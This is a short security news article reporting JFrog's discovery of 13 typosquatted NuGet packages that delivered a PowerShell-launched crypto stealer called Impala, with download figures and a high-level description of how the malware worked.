A sophisticated attack campaign has been identified targeting .NET developers via malicious NuGet packages posted in the public repository. These fake packages impersonate legitimate packages to lure developers and attempt to deliver crypto stealers.

Typosquatted NuGet packages

According to JFrog researchers, the attackers used typosquatting to develop the packages, impersonating genuine packages with similar names.
  • For instance, they created a malicious package named Coinbase[.]Core (downloaded 121.9K times), to dupe the genuine package named Coinbase.
  • Other malicious packages include Anarchy.Wrapper.Net (30.4K downloads) duping genuine package Anarchy-Wrapper, and DiscordRichPresence.API (14.1K downloads) duping DiscordRichPresence.
  • These top three packages have been downloaded over 150,000 times within one month, indicating the wide reach of the campaign.

In all, 13 malicious packages were detected, which were created in the past three months. All the packages have been removed now.

What do the packages do?

When executed, they download and execute a PowerShell script (init[.]ps1) on the infected machine, which updates the machine’s configuration to run PowerShell scripts without any prompt or restrictions.
  • The script downloads a second-stage payload, a custom-built Windows executable, named Impala, that attempts to steal cryptocurrency from the victim’s wallet via Discord webhooks.
  • It acts as an Electron Archive Extractor and attempts to execute code from Electron archives using the Rasar utility.
  • It further drops an updater executable on the machine, which connects to the C2 server to check for the updated version of the malware.

The bottom line

Incidents like these act as a reminder that public code repositories strictly require some automated code control. Experts recommend developers take caution when downloading and running packages, especially from new and unknown authors.
Cyware Publisher

Publisher

Cyware